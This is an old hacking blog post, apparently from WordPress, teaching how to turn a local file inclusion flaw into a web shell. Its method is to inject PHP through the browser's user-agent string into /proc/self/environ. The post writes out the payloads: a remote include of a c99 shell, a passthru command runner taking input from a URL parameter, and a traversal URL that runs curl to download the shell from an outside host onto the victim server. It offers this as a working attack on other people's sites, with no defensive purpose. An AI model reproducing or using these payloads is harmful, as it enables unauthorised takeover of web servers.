Uploading shell by using LFI

Posted: February 25, 2011 by Hacking & Relax in Skill

1. site vuln to lfi
2. php knowledge
3. browser Mozilla Firefox…

So… first you find some site vuln to lfi… now we must check if there are logs…
They are usually stored in /proc/self/environ… so just replace /etc/passwd with /proc/self/environ

If you get something like “DOCUMENT_ROOT=…” then it means you sucessfully found logs 

Now,on that page you can find something like “HTTP_USER_AGENT”…
This value is usually our useragent(mozilla,netscape,etc) and now we must spoof it… but how?

Open a new tab in Mozilla,and type “about :config” (without quotes)…

Now,in “Filter” type: general.useragent.extra.firefox

You will get something like this:

Preference name                            Status     Type        Value
general.useragent.extra.firefox     default     string       Firefox/3.0.7

Now,double click on general.useragent.extra.firefox and replace “Firefox/3.0.7”

<? include("http://shelladdress.com/c99.txt"); ?>

If everything is good you will get shell included… Otherwise,you will get errors… Mostly I was getting error “URL-File access disabled” or something like that… but using php I found another way…

Instead of typing

<? include("http://shelladdress.com/c99.txt"); ?>

as useragent,type this:

<? passthru($_GET['cmd']); ?>

Then load your vuln page like this:

http://yourvulnsite.com/vulnscript.php?page=../../../proc/self/environ%00?cmd=curl http://shelladress.com/c99.txt -o c99.php

So,lets review… basicaly,you are just adding &cmd= thing at the end of url…

Now,using “curl” command you will get content of shell in txt format and by using -o c99.php you will rename it to c99.php…

Now simply go to your site like this:


And that’s all…

Enjoy,if I helped you,hit the thanks button…]


  1. rlngs4 says:

    if we get nothing when trying /proc/self/environ !

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s